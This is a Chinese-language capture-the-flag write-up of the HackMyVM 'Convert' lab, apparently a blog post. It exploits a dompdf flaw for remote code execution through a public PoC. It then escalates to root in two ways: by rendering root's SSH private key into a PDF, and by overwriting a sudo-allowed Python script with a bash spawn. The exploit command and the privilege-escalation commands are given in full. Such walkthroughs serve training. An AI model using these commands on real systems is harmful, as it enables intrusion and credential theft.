HackMyVM-Convert

简介

难度:简单
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Convert
image

环境

  • 攻击机 kali:192.168.18.49
  • 靶机:VBOX:192.168.18.51

信息搜集

端口扫描:22和80端口
image

访问80端口,可以将html网页转换成pdf,保存到/upload目录下
image

image
将pdf导出后,用exiftool查看,发现dompdf
image
网上搜索html转pdf漏洞,也可以搜到这个dompdf漏洞的原理
image

漏洞利用

这里有个直接打包好的poc:
https://github.com/Tw0-Y/THM.git
直接攻击就行了,开个监听,成功弹回shell


python3 dompdf-rce.py --inject http://192.168.18.51/index.php?url= --dompdf http://192.168.18.51/dompdf

image

提权

sudo -l看一下,发现有可以直接用sudo -l 执行的python文件
image
cat一下这个文件,脚本就是将html转换为pdf,这里开始有两种思路:

思路一

将/root目录下的私钥文件转换成pdf,然后用wget下载下来查看,最后用私钥文件直接去ssh连接root


sudo /usr/bin/python3 /home/eva/pdfgen.py -U /root/.ssh/id_rsa -O /var/www/html/1.pdf

思路二

我们发现可以直接创建一个1.python文件,里面是执行bash的命令,然后改名直接覆盖pdfgen.py这个文件

eva@convert:~$ echo 'import os;os.system("/bin/bash")' > 1.py
echo 'import os;os.system("/bin/bash")' > 1.py
eva@convert:~$ ls
ls
1.py
pdf_gen.log
pdfgen.py
user.txt
eva@convert:~$ mv 1.py pdfgen.py
mv 1.py pdfgen.py
eva@convert:~$ ls
ls
pdf_gen.log
pdfgen.py
user.txt
eva@convert:~$ cat pdfgen.py
cat pdfgen.py
import os;os.system("/bin/bash")

最后直接sudo执行新的pdfgen.py这个文件,拿到root
image

posted @ 2026-07-29 13:59  Yhsec  阅读(6)  评论(0)    收藏  举报
//雪花飘落效果